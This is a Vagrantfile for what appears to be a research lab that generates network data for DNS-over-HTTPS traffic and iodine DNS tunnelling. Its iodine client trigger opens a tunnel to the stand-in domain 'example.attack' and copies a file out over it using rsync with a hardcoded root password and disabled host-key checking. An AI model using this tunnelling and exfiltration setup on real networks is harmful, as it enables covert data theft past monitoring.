-
Notifications
You must be signed in to change notification settings - Fork 0
/
Vagrantfile
174 lines (148 loc) · 8.24 KB
/
Vagrantfile
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
# -*- mode: ruby -*-
# vi: set ft=ruby :
Vagrant.configure("2") do |config|
config.vm.define "dnsoverhttps" do |dnsoverhttps|
# Set the box-type and version (default is latest)
dnsoverhttps.vm.box = "ubuntu/focal64"
dnsoverhttps.vm.box_version = ">= 0"
# Set the hostname
dnsoverhttps.vm.hostname = "dnsoverhttps"
# Setup networking
dnsoverhttps.vm.network "private_network", ip: "192.168.0.10", virtualbox__intnet: "intnet"
# Provision VM
dnsoverhttps.vm.provision "shell", path: 'dns-over-https.bash', privileged: true
dnsoverhttps.vm.provision "ansible_local" do |a|
a.install = true,
a.install_mode = "default",
a.playbook = "filebeat_playbook_dnsoverhttps",
a.become_user = "root",
a.become = true
end
# Runtime triggers
dnsoverhttps.trigger.after [:up, :reload] do |trigger|
trigger.info = "Begin TCPDUMP capture."
trigger.run_remote = { inline: 'rm -f nohup.out; nohup tcpdump -i any -s 0 -n -w /tmp/dns.pcap port 53 or port 443 or port 8053 & sleep 1; echo $! > /var/run/tcpdump.pid', privileged: true }
end
dnsoverhttps.trigger.after [:up, :reload] do |trigger|
trigger.info = "Executing 'run'-section of the scenario component."
trigger.run_remote = { inline: 'sudo systemctl stop systemd-resolved; sudo systemctl restart doh-server.service; sudo systemctl restart nginx.service; ', privileged: true }
end
# Data collection
dnsoverhttps.trigger.before [:destroy, :halt, :reload] do |trigger|
trigger.info = "Stopping TCPDUMP"
trigger.run_remote = { inline: 'if [ -f /var/run/tcpdump.pid ]; then kill $(cat /var/run/tcpdump.pid); rm -f /var/run/tcpdump.pid; fi', privileged: true }
end
dnsoverhttps.trigger.before [:destroy, :halt, :reload] do |trigger|
trigger.info = "Changing permissions on the remote artifact: /var/log/nginx/dns.access.log"
trigger.run_remote = { inline: 'chmod o+r /var/log/nginx/dns.access.log', privileged: true }
end
dnsoverhttps.trigger.before [:destroy, :halt, :reload] do |trigger|
trigger.info = "Grabbing artifact from Guest machine: /var/log/nginx/dns.access.log"
trigger.run = { inline: 'vagrant scp dnsoverhttps:/var/log/nginx/dns.access.log dnsoverhttps/' }
end
dnsoverhttps.trigger.before [:destroy, :halt, :reload] do |trigger|
trigger.info = "Removing artifact from Guest machine: /var/log/nginx/dns.access.log"
trigger.run_remote = { inline: 'rm -rf /var/log/nginx/dns.access.log', privileged: true }
end
dnsoverhttps.trigger.before [:destroy, :halt, :reload] do |trigger|
trigger.info = "Changing permissions on the remote artifact: /var/log/doh-server.log"
trigger.run_remote = { inline: 'chmod o+r /var/log/doh-server.log', privileged: true }
end
dnsoverhttps.trigger.before [:destroy, :halt, :reload] do |trigger|
trigger.info = "Grabbing artifact from Guest machine: /var/log/doh-server.log"
trigger.run = { inline: 'vagrant scp dnsoverhttps:/var/log/doh-server.log dnsoverhttps/' }
end
dnsoverhttps.trigger.before [:destroy, :halt, :reload] do |trigger|
trigger.info = "Removing artifact from Guest machine: /var/log/doh-server.log"
trigger.run_remote = { inline: 'rm -rf /var/log/doh-server.log', privileged: true }
end
dnsoverhttps.trigger.before [:destroy, :halt, :reload] do |trigger|
trigger.info = "Changing permissions on the remote artifact: /tmp/filebeat.json*"
trigger.run_remote = { inline: 'chmod o+r /tmp/filebeat.json*', privileged: true }
end
dnsoverhttps.trigger.before [:destroy, :halt, :reload] do |trigger|
trigger.info = "Grabbing artifact from Guest machine: /tmp/filebeat.json*"
trigger.run = { inline: 'vagrant scp dnsoverhttps:/tmp/filebeat.json* dnsoverhttps/' }
end
dnsoverhttps.trigger.before [:destroy, :halt, :reload] do |trigger|
trigger.info = "Removing artifact from Guest machine: /tmp/filebeat.json*"
trigger.run_remote = { inline: 'rm -rf /tmp/filebeat.json*', privileged: true }
end
dnsoverhttps.trigger.before [:destroy, :halt, :reload] do |trigger|
trigger.info = "Changing permissions on the remote artifact: /tmp/dns.pcap"
trigger.run_remote = { inline: 'chmod o+r /tmp/dns.pcap', privileged: true }
end
dnsoverhttps.trigger.before [:destroy, :halt, :reload] do |trigger|
trigger.info = "Grabbing artifact from Guest machine: /tmp/dns.pcap"
trigger.run = { inline: 'vagrant scp dnsoverhttps:/tmp/dns.pcap dnsoverhttps/' }
end
dnsoverhttps.trigger.before [:destroy, :halt, :reload] do |trigger|
trigger.info = "Removing artifact from Guest machine: /tmp/dns.pcap"
trigger.run_remote = { inline: 'rm -rf /tmp/dns.pcap', privileged: true }
end
end
config.vm.define "iodineserver" do |iodineserver|
# Set the box-type and version (default is latest)
iodineserver.vm.box = "ubuntu/focal64"
iodineserver.vm.box_version = ">= 0"
# Set the hostname
iodineserver.vm.hostname = "iodineserver"
# Setup networking
iodineserver.vm.network "private_network", ip: "192.168.0.20", virtualbox__intnet: "intnet"
# Provision VM
iodineserver.vm.provision "ansible_local" do |a|
a.install = true,
a.install_mode = "default",
a.playbook = 'iodine_server_setup',
a.become_user = "root",
a.become = true
end
# Runtime triggers
iodineserver.trigger.after [:up, :reload] do |trigger|
trigger.info = "Executing 'run'-section of the scenario component."
trigger.run_remote = { inline: 'nohup asciinema rec /tmp/iodine_server_null_base64_0xDEADBEEF.cast -c \'set -x; iodined -4 -c -f 10.0.0.1 example.attack -P 0xDEADBEEF & sleep 1\'', privileged: true }
end
# Data collection
iodineserver.trigger.before [:destroy, :halt, :reload] do |trigger|
trigger.info = "Changing permissions on the remote artifact: /tmp/*.cast"
trigger.run_remote = { inline: 'chmod o+r /tmp/*.cast', privileged: true }
end
iodineserver.trigger.before [:destroy, :halt, :reload] do |trigger|
trigger.info = "Grabbing artifact from Guest machine: /tmp/*.cast"
trigger.run = { inline: 'vagrant scp iodineserver:/tmp/*.cast iodineserver/' }
end
iodineserver.trigger.before [:destroy, :halt, :reload] do |trigger|
trigger.info = "Removing artifact from Guest machine: /tmp/*.cast"
trigger.run_remote = { inline: 'rm -rf /tmp/*.cast', privileged: true }
end
end
config.vm.define "iodineclient" do |iodineclient|
# Set the box-type and version (default is latest)
iodineclient.vm.box = "ubuntu/focal64"
iodineclient.vm.box_version = ">= 0"
# Set the hostname
iodineclient.vm.hostname = "iodineclient"
# Setup networking
iodineclient.vm.network "private_network", ip: "192.168.0.30", virtualbox__intnet: "intnet"
# Provision VM
iodineclient.vm.provision "shell", path: 'iodine_client_setup.bash', privileged: true
# Runtime triggers
iodineclient.trigger.after [:up, :reload] do |trigger|
trigger.info = "Executing 'run'-section of the scenario component."
trigger.run_remote = { inline: 'asciinema rec /tmp/iodine_client_null_base64_0xDEADBEEF.cast -c \'set -x; (iodine -4 -f -P 0xDEADBEEF -Tnull -Obase64 -r 127.0.0.1 example.attack) & sleep 20; rsync -P --rsh="sshpass -p root ssh -l root -oStrictHostKeyChecking=no" 10.0.0.1:/root/test-file /tmp/\'', privileged: true }
end
# Data collection
iodineclient.trigger.before [:destroy, :halt, :reload] do |trigger|
trigger.info = "Changing permissions on the remote artifact: /tmp/*.cast"
trigger.run_remote = { inline: 'chmod o+r /tmp/*.cast', privileged: true }
end
iodineclient.trigger.before [:destroy, :halt, :reload] do |trigger|
trigger.info = "Grabbing artifact from Guest machine: /tmp/*.cast"
trigger.run = { inline: 'vagrant scp iodineclient:/tmp/*.cast iodineclient/' }
end
iodineclient.trigger.before [:destroy, :halt, :reload] do |trigger|
trigger.info = "Removing artifact from Guest machine: /tmp/*.cast"
trigger.run_remote = { inline: 'rm -rf /tmp/*.cast', privileged: true }
end
end
end